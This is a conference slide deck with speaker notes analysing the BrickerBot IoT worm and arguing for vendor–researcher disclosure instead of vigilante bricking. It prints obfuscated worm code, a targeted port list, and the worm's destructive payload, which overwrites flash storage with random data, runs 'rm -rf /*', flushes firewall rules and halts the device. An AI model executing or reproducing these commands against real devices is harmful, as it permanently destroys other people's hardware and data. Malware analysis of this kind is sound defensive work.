SlideShare a Scribd company logo

Brick all the internet of things!(with notes)

Jimmy Shah
Jimmy Shah

Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service. We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.

Technology
1 of 44
Download to read offline
Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
DDOS via IoT Botnet ● Similar to DDOSaaS ○ Except the bots are free ■ Even more free? Due to default creds. Mirai Linux.Wifatch Linux.Hajime
So, Brickerbot?
So, Brickerbot? ● What’s bricking? ○ Turning a useful device into something as useful as a ‘brick’
Brickerbot: source code ● Want a copy of Brickerbot? ○ Google ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1” ● Mirrored on github and various pastebin like sites
Aside: Malware analysis process - under pressure ● Not always enough time ○ fully unwind and solve every aspect of every puzzle within a sample ■ That’s called ‘vacation’ ● Interested parties breathing down analysts’ necks ○ Customers, bosses, competitors, press ■ Handling these is ‘the job’ ● Identify IOCs(Indicators of Compromise) ○ What is the least I need to see before I know my home/office/business is irrecoverable?
Brickerbot: Getting to the heart of the issue ● Malware analysis ○ Get it running(VM, python(s), no network) ■ Nope, bad interp. Python2 ■ Nope, symbol not found. ‘Extra’ whitespace. ■ Nope, libraries not imported. Enough nonsense. ○ De-obfuscate ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’. ● (still, become friends with tokenizer.py) ■ Custom script to remove dead code ● Become friends with PyLint ■ Pretty-print remainder of source
Brickerbot: Getting to the heart of the issue,cont. ● Malware analysis ○ Examine low-hanging fruit ■ Strings ● Seriously ● First step used by malware analysts ■ Read reports by other analysts ● Catch what you missed/ran out of time to find ● Re-prioritize resources towards areas that have greatest impact
Brickerbot: Source code - obfusc., ex. whitespace 1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI 2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo 4. if 21 - 21: Oooo - I11I1Ii 5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO 6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO 7. time . sleep ( 3 ) 8. if 20 - 20: Oo0 9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO 12. if 84 - 84: I11I1Ii * Ii11i1iIi 13. I1IiI1I1 = OOo0O0oOOOO 14. if 4 - 4: Oooo + oOOo0000o 15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 16. i111IIIiII1i = False 17. Oo0O00OOooO = False 18. IiiI1 = False 19. oOI11IIIi1II111 = True 20. iiIII11I1i1Ii = True 21. I1i = True 22. i11iiiIi = True 23. i1iii = True 24. OOoOo00oO0 = True 25. OO00oo0o = True 26. if 5 - 5: IIiII + O0oo - i1 27. if 52 - 52: oOoO0Ooo / Ii / Ii 28. if 24 - 24: oOOoO00oo0 29. i11 = [ ] 30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ] 31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
Brickerbot: Source code - eliminate dead code 1. def IIi1IIii11I1I(targetip, targetport): 2. global i1Iiii1i11i 3. O0000oO0O = (targetip, int(targetport)) 4. I11i1I = hash(O0000oO0O) 5. if I11i1I in iIIiii11Ii1: 6. return 7. IiI1i1ii1[I11i1I] = 0 8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport)) 9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60 10. iIoO000oO[I11i1I] = None 11. iIIiii11Ii1.append(I11i1I) 12. 13. def i1iiiiIi(targetip, targetport, jobhash): 14. O0000oO0O = (targetip, int(targetport)) 15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16. O0OOo00o00o.setblocking(0) 17. try: 18. O0OOo00o00o.connect(O0000oO0O) 19. except: 20. pass 21. I11i1I = hash(O0OOo00o00o) 22. O00OiiI1iIiiI.append(O0OOo00o00o) 23. Oooo0[I11i1I] = (targetip, int(targetport)) 24. Iii1iiiI[I11i1I] = 0 25. i1I11IIIIIi[I11i1I] = time.time() 26. I1iiO000o00o0[I11i1I] = jobhash 27. iIoO000oO[jobhash] = O0OOo00o00o 28. return O0OOo00o00o
Brickerbot: Source code - Strings, bricking 1. ii11II += 2. '''busybox route del default 3. cat /dev/urandom >/dev/mtdblock0 & 4. cat /dev/urandom >/dev/mtdblock1 & 5. cat /dev/urandom >/dev/mtdblock2 & 6. cat /dev/urandom >/dev/mtdblock3 & 7. cat /dev/urandom >/dev/mtdblock4 & 8. cat /dev/urandom >/dev/mtdblock5 & 9. cat /dev/urandom >/dev/mmcblk0 & 10. cat /dev/urandom >/dev/mmcblk0p9 & 11. cat /dev/urandom >/dev/mmcblk0p12 & 12. cat /dev/urandom >/dev/mmcblk0p13 & 13. cat /dev/urandom >/dev/root & 14. cat /dev/urandom >/dev/mmcblk0p8 & 15. cat /dev/urandom >/dev/mmcblk0p16 & 16. ''' 17. ii11II += 18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null & 19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP 20. halt -n -f 21. reboot 22. '''
“Zombie” cars
“Zombie” cars - “It’s Zombie time.” We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
“Zombie” cars So in order to stop Criminals from hijacking our cars and turning them into bombs...
Security: Gaining industry buy-in
Security: Gaining industry buy-in; Doing it right?
Security: Gaining industry buy-in; Doing it right 1. Get someone credible to organize/liaise with industry players a. Renderman 2. Provide guidelines for disclosure to vendors 3. Provide guidelines for communication with researchers 4. Suggest/provide solutions a. Mostly suggest. Nobody’s using provided code. 5. Branding a. Internet of Dongs Project b. DVEs(Dong Vulnerability and Exposures)
Questions?
Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
Nixon is a great security researcher and I agree wholeheartedly with the first half of this statement. Attackers are using botnets primarily for profit. Distributed Denial of Service(DDOS) as a primary source of income. I respectfully disagree with the idea that the only solution is to turn to law enforcement. Unfortunately while Law enforcement has great powers of investigation and response after the fact, there are still a number of steps we can take to prevent attacks. Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
Attackers exploiting botnets to perform large scale DDOSes has become common. Bots, or Robots or Zombies, whatever are nodes in a network of malicious machines. Traditionally attackers either infected machines with malware or on a less automated fashion convince users to perform like bots. LOIC is an example of software that allows users to participate in a DDOS. This is the simplest technique where each user is independent but collaborates with a multitude of like minded users. Imagine a hundred thousand individuals each with a single rifle all aiming at the same target. Some will miss. Some rifles will misfire. Some will never understand how to fire a bullet. Regardless a majority will hit the target. Of course the efficiency of such an attack is much less than one that eliminates human error. Infecting numerous bots is sometimes only the first step. An attacker with hundreds of thousands or millions of bots needs to do something with them. They make no money lying idle. This is where another traditional technique is used, DOSaaS(Denial of Service as a Service). I have a botnet, you pay me to take your target down, we all profit. Except the major site we’ve just knocked down. DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
Attackers are looking to make a profit. The usual methods work, but they can be costly. There is a need to purchase or develop one own’s malware to build up one’s botnet. IoT botnets help to reduce those costs. Several IoT botnets have had their source code released by their authors. Turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no real authentication. Default credentials. Let me repeat that, default username/password combinations that users can’t easily change. Mirai made the big splash, using a long list of default credentials to log in to embedded devices and then turning them into bots. Having a list of default creds is useful, but more benevolent trespassers on one’s internet enabled cameras and home routers can also use the same in order to log in and patch your systems. Linux.Wifatch s famous for being a worm that connects to IoT devices and patches them, locking out the bad guys. Linux.Hajime does something similar, locking down ports preventing other botnets from connecting. As another show of good faith the authors of Linux.Wifatch released the source code to their patching worm.[1] Good or bad, none of these worms would gain as much traction amongst IoT devices if it were possible to modify logins. [1] https://gitlab.com/rav7teif/linux.wifatch DDOS via IoT Botnet ● Similar to DDOSaaS ○ Except the bots are free ■ Even more free? Due to default creds. Mirai Linux.Wifatch Linux.Hajime
Right so, Brickerbot. Where Wifatch and Hajime do their part in securing devices by changing passwords or disabling outside access, Brickerbot goes about it in a slightly different manner. If we just brick all of these vulnerable IoT devices they can’t be turned against us. Great idea. Mudge, of L0pht and DARPA, has heard about this idea too. From reasonable folks in the Intelligence Community and the Department of Defense. These are kind of the folks who get to take direct action. Except it seems even they couldn’t get away with bricking the devices of civilians in the US and all over the world. So, Brickerbot?
The author of Brickerbot calls himself The Doctor. He has also posted on an underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor directly connects online identities or claims credit. Attribution is harder when all you have is the end result such as a binary or obfuscated script. A source code release like the authors of Linux.Wifatch did is a primary method of claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is like showing off portions of a wrecked fighter aircraft with any and all markings or identifying information missing/removed. It makes for a great showpiece and allows one to take or (more often)give credit. Other researchers suggest that some of the attacks that The Doctor claimed, such as one on a major mobile carrier’s network, were not performed by him or at least not using any of the exploits contained in Brickerbot. Do we just take the word of whichever party we have a greater trust in? Minus a release of source or of forensic results from various attacks it seems that’s the default position. Where are we? 1) We may not be able to trust Brickerbot’s ‘author’ 2) The publicly available sample is essentially an obfuscated list of exploits and ‘bricking’ code 3) We need to examine the Brickerbot code a little closer to see what we have
Bricking is just turning useful devices into something as useful as a brick. This a perfectly legal action that one can perform on devices that one owns. When done to others, it is almost always illegal and occasionally an act of war. To be clear, Brickerbot is intended to operate entirely on others’ devices. So, Brickerbot? ● What’s bricking? ○ Turning a useful device into something as useful as a ‘brick’
Normally coming from the malware analysis side, I’m loath to help spread malware. In this case, the cat is out of the bag, the horses have left the barn, and there are dozens of pastebin like sites and one or two github accounts with a copy of the released Brickerbot script. So if you would like a copy of the script in order to play along at home/analyze just google for the following line. Brickerbot: source code ● Want a copy of Brickerbot? ○ Google ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1” ● Mirrored on github and various pastebin like sites
A quick aside about the malware analysis process. Assuming you’re not doing it as a hobby it’s almost always performed under pressure. One never has enough time to do a complete teardown, to check every nook and cranny of a given target. You may love puzzles and even enjoy completely solving them, but you never have that time at work. When you eventually do, it’s known as that nearly mythical time period ‘vacation’. An analyst always has to deal with multiple competing pressures from various interested parties. In no particular order: ● Customers ● Bosses/Upper Management ● Competitors ● Press Depending on how one receives a sample one or more of these will be aware and the clock starts ticking. One won’t always satisfy all parties. Regardless, handling the various competing interests is the job. Ok you don’t have unlimited time. A customer is under attack. The press is minutes from publishing. Higher ups are yelling at your boss for an update. What do you do? Generally one searches for IOCs(Indicators of Compromise). It really does become: What is the least I need to see before I know my home/office/business is irrecoverable? Aside: Malware analysis process - under pressure ● Not always enough time ○ fully unwind and solve every aspect of every puzzle within a sample ■ That’s called ‘vacation’ ● Interested parties breathing down analysts’ necks ○ Customers, bosses, competitors, press ■ Handling these is ‘the job’ ● Identify IOCs(Indicators of Compromise) ○ What is the least I need to see before I know my home/office/business is irrecoverable?
What has The Doctor dropped in our collective laps? We’ve got a script that appears obfuscated. No line listing the interpreter the shell should use. First steps for analyzing this malware: 1) Let’s see if it runs a) Make sure the VM has no network access b) Include possible runtimes(pyhton2, python3) Shocker! It doesn't run. Why? Running with Python3 fails. Mainly due to the print statement becoming a function in Python 3. Thus we know it’s python 2. Running under Python 2 it fails. Symbol not found. In this case due to additional whitespace turning a function call into an undefined symbol. Next, we need to remove extraneous whitespace. Re-run and it fails again. This time due to not a single library being imported. You have to be kidding me. The script as provided was never intended to run. 2) Maybe de-obfuscating the script would simplify the analysis ● writing a custom de-obfuscator is a good solution, unfortunately it’s a vacation project. We’ve still got a job to do. • It’s good to get acquainted with tokenizer.py for that eventual vacation ● We can still write a one-off script to quickly remove dead code. Dead code being things like If statements that are always false, or statements Brickerbot: Getting to the heart of the issue ● Malware analysis ○ Get it running(VM, python(s), no network) ■ Nope, bad interp. Python2 ■ Nope, symbol not found. ‘Extra’ whitespace. ■ Nope, libraries not imported. Enough nonsense. ○ De-obfuscate ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’. ● (still, become friends with tokenizer.py) ■ Custom script to remove dead code ● Become friends with PyLint ■ Pretty-print remainder of source
Now you’ve figured it’s non-functional. Now its time to find all low hanging fruit. In this case, the author provided the initial hint. Suggesting that one could just check the unencrypted/unobfuscated strings. One of the first steps in statically analyzing all malware is to extract all strings. Really. Some of the best clues for attribution come from identifiers left in the code, or shout- outs to colleagues or malware researchers. Egos have led to a number of malware authors getting convicted. In the case of Brickerbot, the simple obfuscation used by the author removes all identifiers(i.e. variable names, messages, etc.). It’s more about not having it tied back to the author than making it difficult to learn how the worm operates. Another time-saver used in analysis is to read other analysts’ reports. This lets you see if you’ve missed anything important(e.g. malware emailing all your contacts). It also lets you re-direct analysis to portions of the malware not yet analyzed or to specific payloads. With Brickerbot, since it won’t run and there’s much useless code an analyst can look at it as a container for various IoT device exploits Brickerbot: Getting to the heart of the issue,cont. ● Malware analysis ○ Examine low-hanging fruit ■ Strings ● Seriously ● First step used by malware analysts ■ Read reports by other analysts ● Catch what you missed/ran out of time to find ● Re-prioritize resources towards areas that have greatest impact
Let’s look at the Brickerbot source code. Random, similar looking variable names, more whitespace than necessary. This looks horrible. The if statements where the conditional is equivalent to 0 will never run the code that follows. Dead code. There are spaces in function calls. These don’t even help readability so the sleep call on line 7 isn’t actually a .sleep() call, it’s just the undefined symbol time a dot and the undefined symbol sleep. Much of this can be removed as described earlier with a custom script to delete all dead code. Brickerbot: Source code - obfusc., ex. whitespace 1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI 2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo 4. if 21 - 21: Oooo - I11I1Ii 5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO 6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO 7. time . sleep ( 3 ) 8. if 20 - 20: Oo0 9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO 12. if 84 - 84: I11I1Ii * Ii11i1iIi 13. I1IiI1I1 = OOo0O0oOOOO 14. if 4 - 4: Oooo + oOOo0000o 15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 16. i111IIIiII1i = False 17. Oo0O00OOooO = False 18. IiiI1 = False 19. oOI11IIIi1II111 = True 20. iiIII11I1i1Ii = True 21. I1i = True 22. i11iiiIi = True 23. i1iii = True 24. OOoOo00oO0 = True 25. OO00oo0o = True 26. if 5 - 5: IIiII + O0oo - i1 27. if 52 - 52: oOoO0Ooo / Ii / Ii 28. if 24 - 24: oOOoO00oo0 29. i11 = [ ] 30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ] 31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
Ok, now things are looking a bit cleaner, we can see functions. Names that have been obfuscated are lost, but one can eventually rename them according to their function. Similar to what one does with functions in an unknown binary. This is also after pretty-printing the script so that we get rid of the excessive/additional whitespace. Also like mentioned earlier, no libraries are imported so the code still won’t run. You should be getting a better picture of the roadblocks placed in the code. Brickerbot: Source code - eliminate dead code 1. def IIi1IIii11I1I(targetip, targetport): 2. global i1Iiii1i11i 3. O0000oO0O = (targetip, int(targetport)) 4. I11i1I = hash(O0000oO0O) 5. if I11i1I in iIIiii11Ii1: 6. return 7. IiI1i1ii1[I11i1I] = 0 8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport)) 9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60 10. iIoO000oO[I11i1I] = None 11. iIIiii11Ii1.append(I11i1I) 12. 13. def i1iiiiIi(targetip, targetport, jobhash): 14. O0000oO0O = (targetip, int(targetport)) 15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16. O0OOo00o00o.setblocking(0) 17. try: 18. O0OOo00o00o.connect(O0000oO0O) 19. except: 20. pass 21. I11i1I = hash(O0OOo00o00o) 22. O00OiiI1iIiiI.append(O0OOo00o00o) 23. Oooo0[I11i1I] = (targetip, int(targetport)) 24. Iii1iiiI[I11i1I] = 0 25. i1I11IIIIIi[I11i1I] = time.time() 26. I1iiO000o00o0[I11i1I] = jobhash 27. iIoO000oO[jobhash] = O0OOo00o00o 28. return O0OOo00o00o
Now we can go back to step 1 of the static malware analysis process, searching for strings. This particular segment includes commands that overwrite storage on a particular device with random data. Routes and firewall rules are cleared from memory and deleted. Then the system is stopped and rebooted. By now there should be no code left to run so your home router is now useless. So what do we know now? 1) this code is annoying 2) so is The doctor 3) all devices with the default username and password will get disabled permanently 4) Vulnerable devices are fixed now, since they can’t work they’re safe So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger embedded systems and Internet connected devices face similar threats? Can a brickerbot for my washing machine be much far away? Would other larger devices be more vulnerable? Say my car? Brickerbot: Source code - Strings, bricking 1. ii11II += 2. '''busybox route del default 3. cat /dev/urandom >/dev/mtdblock0 & 4. cat /dev/urandom >/dev/mtdblock1 & 5. cat /dev/urandom >/dev/mtdblock2 & 6. cat /dev/urandom >/dev/mtdblock3 & 7. cat /dev/urandom >/dev/mtdblock4 & 8. cat /dev/urandom >/dev/mtdblock5 & 9. cat /dev/urandom >/dev/mmcblk0 & 10. cat /dev/urandom >/dev/mmcblk0p9 & 11. cat /dev/urandom >/dev/mmcblk0p12 & 12. cat /dev/urandom >/dev/mmcblk0p13 & 13. cat /dev/urandom >/dev/root & 14. cat /dev/urandom >/dev/mmcblk0p8 & 15. cat /dev/urandom >/dev/mmcblk0p16 & 16. ''' 17. ii11II += 18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null & 19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP 20. halt -n -f 21. reboot 22. '''
What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see what an expert on automotive security thinks. Charlie Miller is formerly of the NSA, but has made a name for himself in the private sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain Picard, clever and wise. He wrote the first public exploits for Android and iOS, on the Google G1 and original iPhone. Later he and Chris Valasek received a grant from DARPA’s Cyber Fast Track program(the same one founded by Mudge) to research automotive security. So he moved on from hacking PCs, to hacking phones, to hacking the very cars you and I drive. And people complained, ‘but those aren’t remote exploits. You’ve got to be in the car to hack them. Any crook can do that.’ And verily, Charlie and Chris developed remote exploits. SO when Charlie says that 1) it’s not simple to hack all the cars 2) there aren’t as many people hacking cars you’d do well to believe him. “Zombie” cars
Except movie hackers… If you’ve seen the seminal ‘Hackers’(1996) you know that “real” hackers can be determined by their hairstyles. Dreadlocks, in fact possibly being a necessary factor in successful cyber attacks. E.g. Matthew Lillard’s character Cereal Killer. As one can see Ms. Theron’s character, Cypher, must be quite the criminal hacker. After all, the main heroes in the film(Johnson,Diesel & Statham) lack both hair and computer skills. Realistically one can get a better sense of the threat posed by Cypher by viewing her environment. She is obviously well-funded(either State-backed or via independent fortune) and employs a full team of experts. Especially experts that can hack cars. When an underling tells her there are a couple thousand cars in the vicinity of her target, she orders him to hack all of them. Yes, all of them. Never mind the brand, the Telematics system, any and all firmware(or lack of such) within each of these thousands of automobiles. Those hacker dreads must confer some extreme hacking powers. “Zombie” cars - “It’s Zombie time.” We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
We should just brick everybody's car in a 5 mile radius. It’s not like anyone needs to get to work, pick up their kids, drive a buddy to the hospital, drive for lyft/uber. Maybe they didn’t really need their personal cars. This goes back to the original idea of abdicating any responsibility as developers and manufacturers of IoT devices to Law Enforcement. Or in the case of The Doctor, to vigilantes. It's a common idea that fixing bugs at the earliest point in development is many times cheaper and less dangerous than patching them after release. Though we can’t always fix before customers take possession. It’s possible to release firmware updates and patches afterwards, but there is not always incentive to do so. The manufacturer of my car will occasionally release updates for the Telematics system living in my dash, but the manufacturer of my new Internet enabled Toaster might say it’s no longer supported. This is not usually a problem. Until attackers not as benevolent as the Wifatch and Hajime authors or Charlie & Chris will discover and exploit a vulnerability to turn your new Mustang into a torpedo. With Miller & Valasek I know they’ll make an effort to reach out to the manufacturer and enable a patch or update to be created. We can learn lessons from the way vulnerability reports are handled on other platforms. Embedded systems and IoT devices are not as dissimilar from desktop and server PCs as one would think. The same way security researchers reach out to Apple or Google for bugs in their phone OSes, they can reach out to various device manufacturers. “Zombie” cars So in order to stop Criminals from hijacking our cars and turning them into bombs...
It can be difficult to get industry members to agree on issues like vulnerability disclosure, regular patching and in general working with outside security researchers. It is very much like the common description of ‘herding cats’. While many of the players may look similar and even share similar interests it is difficult to get them all to come to the table. Each company has no special reason to trust another. It usually takes commonly trusted individuals and backing from companies with greater resources just to begin the conversation. Fortunately we’re seeing motion towards that goal in a small subset of the Internet of Things/Internet-connected embedded devices. Security: Gaining industry buy-in
Security: Gaining industry buy-in; Doing it right?
How do we get all these cats eating peacefully at the same bowl? We can start by selecting someone credible and trusted widely as a focal point for the multitude of players. Get a Pied Piper that all the cats can turn towards. In this case that would be Renderman(Brad Haines), a well known and respected security researcher. He’s also a CISSP. Renderman has a wide range of experience with penetration testing, wireless security and computer security research. A published author and a speaker at numerous computer security(Black Hat USA) and hacker(Def Con) conferences. The interesting part of this is that Renderman is operating within the category of items that fall under the heading ‘Adult Sex Toys’ on Amazon.com. One might have expected that other personal IoT devices, such as fitness trackers, would be where more security research would occur. The recent information leak from Strava which showed running paths of US armed forces members is one such area of research. Here a personal IoT device’s lack of default security and privacy controls ends up violating Operational Security(OPSEC) at US bases around the world. The main threat is not the bases’ locations(arguably opposition forces and host countries already have that knowledge), but more that of current intelligence confirming activity at the bases and possibly number/names of active personnel. Renderman has accomplished something that those of us in other specialties(e.g. Antivirus/Anti-malware) haven’t, he’s managed to convince disparate manufacturers to trust him; both as a source of best security practices and as an interface to the wider community of vulnerability researchers and hackers. Security: Gaining industry buy-in; Doing it right 1. Get someone credible to organize/liaise with industry players a. Renderman 2. Provide guidelines for disclosure to vendors 3. Provide guidelines for communication with researchers 4. Suggest/provide solutions a. Mostly suggest. Nobody’s using provided code. 5. Branding a. Internet of Dongs Project b. DVEs(Dong Vulnerability and Exposures)
Q: What sort of threat model are IoT vendors using? A: Good question. Default credentials implies there is no threat model. A basic threat model would take into account the simplest attacker, your common script kiddie. Take a dictionary of default credentials and list of target addresses and feed them to a scanner or ready made tool. Even after the number of in the wild IoT worms we’ve seen, the script kiddie would still end up with control of a significant number of IoT devices. Unfortunately security is currently at best an afterthought for a large number of vendors. A proper threat model would need to take into account attackers of various skill levels and budgets. Script kiddies might be kept at bay by simply allowing for users to easily change passwords. Or using public-key encryption to ensure firmware updates come only from the manufacturer. Which would also protect the device from script kiddies. Best practices in security will overall protect the bulk of users. If your threat model also includes Nation-State actors, then its likely your development budget is of a commensurate size. It would also need to consider the attack surface for a given device. Does it connect to the Internet? Is the firmware protected from modification? Can an attacker cause the Li ion batteries to overload/ignite? Is it possible to inject malicous traffic into the stream of commands sent to the device? Regardless, these are factors that need to be considered at the beginning of the development cycle and not once product is in the hands of consumers. Once there, it is considerably more expensive to mitigate(e.g by patching, or recalling devices). Questions?

Recommended

THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
John Bambenek
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.d
Antonio Parata
 
Ncc hackers session 4
Ncc hackers session 4Ncc hackers session 4
Ncc hackers session 4
Jemma Davis
 
Security
SecuritySecurity
Security
Bob Cherry
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018
Mender.io
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
 
Man in the Binder
Man in the BinderMan in the Binder
Man in the Binder
Michael Shalyt
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Mender.io
 

Recommended

THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
John Bambenek
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.d
Antonio Parata
 
Ncc hackers session 4
Ncc hackers session 4Ncc hackers session 4
Ncc hackers session 4
Jemma Davis
 
Security
SecuritySecurity
Security
Bob Cherry
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018
Mender.io
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Andrew Morris
 
Man in the Binder
Man in the BinderMan in the Binder
Man in the Binder
Michael Shalyt
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Mender.io
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
EC-Council
 
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ...
Codemotion
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
 
Zero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdfZero Privilege Architectures v1.1_for distribution.pdf
Zero Privilege Architectures v1.1_for distribution.pdf
Thijs Ebbers
 
Practical IoT Security in the Enterprise
Practical IoT Security in the EnterprisePractical IoT Security in the Enterprise
